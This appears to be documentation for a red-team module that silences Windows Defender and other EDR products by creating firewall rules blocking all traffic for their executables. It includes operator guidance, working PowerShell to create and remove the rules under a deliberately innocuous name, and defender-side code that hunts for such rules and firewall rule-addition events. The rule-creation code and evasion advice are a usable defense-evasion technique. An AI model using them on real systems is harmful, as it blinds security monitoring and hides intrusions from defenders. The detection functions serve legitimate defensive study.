Description
Creates Windows Firewall rules that block all inbound and outbound traffic for known EDR/AV processes, matching each rule on the executable path of the process.
Overview
Employment Considerations
Blocking the traffic delays detection rather than suppressing it. Defender caches the events it cannot upload locally, so once the firewall rules are removed the backlog is sent and the events and alerts start showing up in Microsoft Defender Security Center. Plan rule removal as part of the operation rather than an afterthought. Note also that creating or deleting firewall rules requires local administrator rights and is itself recorded on the host: the Windows Firewall With Advanced Security event log logs every rule addition and deletion, so the rules are visible to anyone reviewing that log even while Defender's own telemetry is held back.
Parameters
| Name | Type | Description |
|---|---|---|
| NamePrefix | string | Prefix for the display name of each rule created. The target process name is appended, giving names such as `Core Services Protection Rule - MsMpEng` (see Example Output). |
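The same rule layout, together with the defender-side check for it, reproduced as an added example using the built-in NetSecurity cmdlets. This is not the module's own code: the `Core Services Protection Rule` prefix and the MsMpEng.exe path are taken from the example output below, while the other binary names (MsSense.exe, SenseIR.exe, NisSrv.exe) and all function names are assumptions made here. A Windows Firewall rule carries a single direction, so `Direction : Both` is realised as one inbound and one outbound rule per process. Run from an elevated session.

```powershell
#Requires -RunAsAdministrator
# Added example, not the module's code. Creates, removes and hunts for
# per-process Block rules of the kind shown in the Example Output section.
$ErrorActionPreference = 'Stop'

# The Platform\<version> folder changes with every engine update, so resolve the
# running service's image path instead of hard-coding the one from the example output.
# WinDefend is the service name of Microsoft Defender Antivirus.
function Get-DefenderEnginePath {
    $svc = Get-CimInstance Win32_Service -Filter "Name='WinDefend'"
    if ($svc) { return ($svc.PathName -replace '^"([^"]+)".*$', '$1') }
}

# One inbound and one outbound Block rule, both named "<prefix> - <process>",
# matching any protocol, any port, any address: only the program filter narrows them.
function New-ProcessBlockRule {
    param(
        [Parameter(Mandatory)][string]$NamePrefix,
        [Parameter(Mandatory)][string]$ExecutablePath
    )
    $proc = [IO.Path]::GetFileNameWithoutExtension($ExecutablePath)
    $name = "$NamePrefix - $proc"
    foreach ($dir in 'Inbound', 'Outbound') {
        New-NetFirewallRule -DisplayName $name -Direction $dir -Action Block `
            -Program $ExecutablePath -Protocol Any -Profile Any -Enabled True | Out-Null
    }
    return $name
}

# Removing the rules is what lets the locally cached telemetry flush to the
# portal, so tear-down and the alert burst that follows belong in the same plan.
function Remove-ProcessBlockRules {
    param([Parameter(Mandatory)][string]$NamePrefix)
    Get-NetFirewallRule -DisplayName "$NamePrefix - *" -ErrorAction SilentlyContinue |
        Remove-NetFirewallRule
}

# Defender-side hunt: every Block rule whose program filter points at a known
# security product binary, regardless of what the rule was named.
function Find-SecurityProductBlockRules {
    param([string[]]$Binaries = @('MsMpEng.exe', 'MsSense.exe', 'SenseIR.exe', 'NisSrv.exe'))
    Get-NetFirewallRule -Action Block | ForEach-Object {
        $rule   = $_
        $filter = $rule | Get-NetFirewallApplicationFilter
        if ($filter.Program -and ($Binaries -contains (Split-Path $filter.Program -Leaf))) {
            [pscustomobject]@{
                DisplayName = $rule.DisplayName
                Direction   = $rule.Direction
                Program     = $filter.Program
                Enabled     = $rule.Enabled
            }
        }
    }
}

# The firewall's own log records each rule addition as event 2004 (deletion is 2006),
# which is available locally even while Defender's cloud telemetry is blocked.
function Get-RecentFirewallRuleAdditions {
    param([int]$Hours = 24)
    $ms = $Hours * 3600000
    Get-WinEvent -LogName 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' `
        -FilterXPath "*[System[EventID=2004 and TimeCreated[timediff(@SystemTime) <= $ms]]]" `
        -ErrorAction SilentlyContinue
}

# Usage (operator side), reproducing the rule from the Example Output section:
#   $path = Get-DefenderEnginePath
#   New-ProcessBlockRule -NamePrefix 'Core Services Protection Rule' -ExecutablePath $path
#   Remove-ProcessBlockRules -NamePrefix 'Core Services Protection Rule'
# Usage (defender side):
#   Find-SecurityProductBlockRules | Format-Table
#   Get-RecentFirewallRuleAdditions | Select-Object TimeCreated, Message
```

The hunt deliberately keys on the program filter rather than on the rule name, since the prefix is operator-chosen and the example name is made to blend in with legitimate-sounding rules. Because the rules are written to the local policy store, `Find-SecurityProductBlockRules` also catches rules created by other tooling that targets the same binaries.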
Example Output
```text
Version          : v2.28
Name             : Core Services Protection Rule - MsMpEng
Description      :
Enabled          : True
ExecutablePath   : C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25030.2-0\MsMpEng.exe
Protocol         : Any
Direction        : Both
Action           : Block
LocalPorts       : {}
RemotePorts      : {}
LocalAddresses   : {}
RemoteAddresses  : {}
```
